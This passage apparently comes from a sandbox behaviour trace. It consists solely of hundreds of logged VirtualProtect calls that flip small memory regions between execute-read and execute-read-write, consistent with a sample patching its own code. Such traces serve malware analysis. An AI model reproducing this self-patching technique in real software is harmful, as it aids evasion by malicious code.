lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.753] VirtualProtect (in: lpAddress=0x1e71444, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.754] VirtualProtect (in: lpAddress=0x1e71459, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.754] VirtualProtect (in: lpAddress=0x1e71459, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.754] VirtualProtect (in: lpAddress=0x1e71474, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.754] VirtualProtect (in: lpAddress=0x1e71474, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.754] VirtualProtect (in: lpAddress=0x1e71495, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.754] VirtualProtect (in: lpAddress=0x1e71495, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.755] VirtualProtect (in: lpAddress=0x1e714a1, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.755] VirtualProtect (in: lpAddress=0x1e714a1, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.755] VirtualProtect (in: lpAddress=0x1e714a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.755] VirtualProtect (in: lpAddress=0x1e714a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.755] VirtualProtect (in: lpAddress=0x1e714c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.756] VirtualProtect (in: lpAddress=0x1e714c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.756] VirtualProtect (in: lpAddress=0x1e714d9, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.756] VirtualProtect (in: lpAddress=0x1e714d9, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.756] VirtualProtect (in: lpAddress=0x1e714f2, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.756] VirtualProtect (in: lpAddress=0x1e714f2, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.756] VirtualProtect (in: lpAddress=0x1e7150a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.757] VirtualProtect (in: lpAddress=0x1e7150a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.757] VirtualProtect (in: lpAddress=0x1e7151a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.757] VirtualProtect (in: lpAddress=0x1e7151a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.757] VirtualProtect (in: lpAddress=0x1e71540, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.757] VirtualProtect (in: lpAddress=0x1e71540, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.757] VirtualProtect (in: lpAddress=0x1e71546, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.758] VirtualProtect (in: lpAddress=0x1e71546, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.758] VirtualProtect (in: lpAddress=0x1e7154b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.758] VirtualProtect (in: lpAddress=0x1e7154b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.758] VirtualProtect (in: lpAddress=0x1e71551, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.758] VirtualProtect (in: lpAddress=0x1e71551, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.758] VirtualProtect (in: lpAddress=0x1e7156a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.759] VirtualProtect (in: lpAddress=0x1e7156a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.759] VirtualProtect (in: lpAddress=0x1e71570, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.759] VirtualProtect (in: lpAddress=0x1e71570, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.759] VirtualProtect (in: lpAddress=0x1e7158e, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.759] VirtualProtect (in: lpAddress=0x1e7158e, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.760] VirtualProtect (in: lpAddress=0x1e715c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.760] VirtualProtect (in: lpAddress=0x1e715c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.760] VirtualProtect (in: lpAddress=0x1e715c6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.760] VirtualProtect (in: lpAddress=0x1e715c6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.760] VirtualProtect (in: lpAddress=0x1e715e5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.760] VirtualProtect (in: lpAddress=0x1e715e5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.761] VirtualProtect (in: lpAddress=0x1e715f1, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.761] VirtualProtect (in: lpAddress=0x1e715f1, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.761] VirtualProtect (in: lpAddress=0x1e7160e, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.761] VirtualProtect (in: lpAddress=0x1e7160e, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.761] VirtualProtect (in: lpAddress=0x1e71650, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.762] VirtualProtect (in: lpAddress=0x1e71650, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.762] VirtualProtect (in: lpAddress=0x1e71673, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.762] VirtualProtect (in: lpAddress=0x1e71673, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.762] VirtualProtect (in: lpAddress=0x1e7167c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.762] VirtualProtect (in: lpAddress=0x1e7167c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.762] VirtualProtect (in: lpAddress=0x1e7169b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.763] VirtualProtect (in: lpAddress=0x1e7169b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.763] VirtualProtect (in: lpAddress=0x1e716a6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.763] VirtualProtect (in: lpAddress=0x1e716a6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.763] VirtualProtect (in: lpAddress=0x1e716b1, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.763] VirtualProtect (in: lpAddress=0x1e716b1, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.763] VirtualProtect (in: lpAddress=0x1e716bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.764] VirtualProtect (in: lpAddress=0x1e716bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.764] VirtualProtect (in: lpAddress=0x1e716d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.764] VirtualProtect (in: lpAddress=0x1e716d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.764] VirtualProtect (in: lpAddress=0x1e716ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.764] VirtualProtect (in: lpAddress=0x1e716ec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.764] VirtualProtect (in: lpAddress=0x1e716f7, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.765] VirtualProtect (in: lpAddress=0x1e716f7, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.765] VirtualProtect (in: lpAddress=0x1e7171c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.765] VirtualProtect (in: lpAddress=0x1e7171c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.765] VirtualProtect (in: lpAddress=0x1e71734, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.765] VirtualProtect (in: lpAddress=0x1e71734, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.766] VirtualProtect (in: lpAddress=0x1e7173f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.766] VirtualProtect (in: lpAddress=0x1e7173f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.766] VirtualProtect (in: lpAddress=0x1e71757, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.766] VirtualProtect (in: lpAddress=0x1e71757, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.766] VirtualProtect (in: lpAddress=0x1e71762, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.766] VirtualProtect (in: lpAddress=0x1e71762, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.767] VirtualProtect (in: lpAddress=0x1e71793, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.767] VirtualProtect (in: lpAddress=0x1e71793, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.767] VirtualProtect (in: lpAddress=0x1e717a5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.767] VirtualProtect (in: lpAddress=0x1e717a5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.767] VirtualProtect (in: lpAddress=0x1e717b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.768] VirtualProtect (in: lpAddress=0x1e717b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.768] VirtualProtect (in: lpAddress=0x1e717c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.768] VirtualProtect (in: lpAddress=0x1e717c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.768] VirtualProtect (in: lpAddress=0x1e717e3, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.768] VirtualProtect (in: lpAddress=0x1e717e3, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.768] VirtualProtect (in: lpAddress=0x1e717f5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.769] VirtualProtect (in: lpAddress=0x1e717f5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.769] VirtualProtect (in: lpAddress=0x1e71800, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.769] VirtualProtect (in: lpAddress=0x1e71800, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.769] VirtualProtect (in: lpAddress=0x1e71812, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.769] VirtualProtect (in: lpAddress=0x1e71812, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.769] VirtualProtect (in: lpAddress=0x1e7181d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.770] VirtualProtect (in: lpAddress=0x1e7181d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.770] VirtualProtect (in: lpAddress=0x1e71835, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.770] VirtualProtect (in: lpAddress=0x1e71835, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.770] VirtualProtect (in: lpAddress=0x1e7184d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.770] VirtualProtect (in: lpAddress=0x1e7184d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.770] VirtualProtect (in: lpAddress=0x1e71865, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.771] VirtualProtect (in: lpAddress=0x1e71865, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.771] VirtualProtect (in: lpAddress=0x1e7187d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.771] VirtualProtect (in: lpAddress=0x1e7187d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.771] VirtualProtect (in: lpAddress=0x1e718dd, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.771] VirtualProtect (in: lpAddress=0x1e718dd, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.772] VirtualProtect (in: lpAddress=0x1e718e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.772] VirtualProtect (in: lpAddress=0x1e718e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.772] VirtualProtect (in: lpAddress=0x1e71900, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.772] VirtualProtect (in: lpAddress=0x1e71900, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.772] VirtualProtect (in: lpAddress=0x1e71925, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.772] VirtualProtect (in: lpAddress=0x1e71925, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.773] VirtualProtect (in: lpAddress=0x1e7193d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.773] VirtualProtect (in: lpAddress=0x1e7193d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.773] VirtualProtect (in: lpAddress=0x1e71955, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.773] VirtualProtect (in: lpAddress=0x1e71955, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.773] VirtualProtect (in: lpAddress=0x1e7197d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.773] VirtualProtect (in: lpAddress=0x1e7197d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.774] VirtualProtect (in: lpAddress=0x1e71995, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.774] VirtualProtect (in: lpAddress=0x1e71995, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.774] VirtualProtect (in: lpAddress=0x1e71a49, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.774] VirtualProtect (in: lpAddress=0x1e71a49, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.775] VirtualProtect (in: lpAddress=0x1e71af7, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.775] VirtualProtect (in: lpAddress=0x1e71af7, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.775] VirtualProtect (in: lpAddress=0x1e71b0f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.775] VirtualProtect (in: lpAddress=0x1e71b0f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.776] VirtualProtect (in: lpAddress=0x1e71b34, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.776] VirtualProtect (in: lpAddress=0x1e71b34, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.776] VirtualProtect (in: lpAddress=0x1e71b3f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.776] VirtualProtect (in: lpAddress=0x1e71b3f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.776] VirtualProtect (in: lpAddress=0x1e71d20, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.777] VirtualProtect (in: lpAddress=0x1e71d20, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.777] VirtualProtect (in: lpAddress=0x1e71e2f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.777] VirtualProtect (in: lpAddress=0x1e71e2f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.777] VirtualProtect (in: lpAddress=0x1e71f18, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.777] VirtualProtect (in: lpAddress=0x1e71f18, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.778] VirtualProtect (in: lpAddress=0x1e71f51, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.778] VirtualProtect (in: lpAddress=0x1e71f51, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.778] VirtualProtect (in: lpAddress=0x1e71fb5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.778] VirtualProtect (in: lpAddress=0x1e71fb5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.778] VirtualProtect (in: lpAddress=0x1e72074, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.779] VirtualProtect (in: lpAddress=0x1e72074, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.779] VirtualProtect (in: lpAddress=0x1e72078, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.779] VirtualProtect (in: lpAddress=0x1e72078, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.779] VirtualProtect (in: lpAddress=0x1e7208d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.779] VirtualProtect (in: lpAddress=0x1e7208d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.779] VirtualProtect (in: lpAddress=0x1e720a2, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.780] VirtualProtect (in: lpAddress=0x1e720a2, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.780] VirtualProtect (in: lpAddress=0x1e7216c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.780] VirtualProtect (in: lpAddress=0x1e7216c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.780] VirtualProtect (in: lpAddress=0x1e72170, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.780] VirtualProtect (in: lpAddress=0x1e72170, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.781] VirtualProtect (in: lpAddress=0x1e721be, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.781] VirtualProtect (in: lpAddress=0x1e721be, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.781] VirtualProtect (in: lpAddress=0x1e721dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.781] VirtualProtect (in: lpAddress=0x1e721dc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.781] VirtualProtect (in: lpAddress=0x1e7229d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.781] VirtualProtect (in: lpAddress=0x1e7229d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: 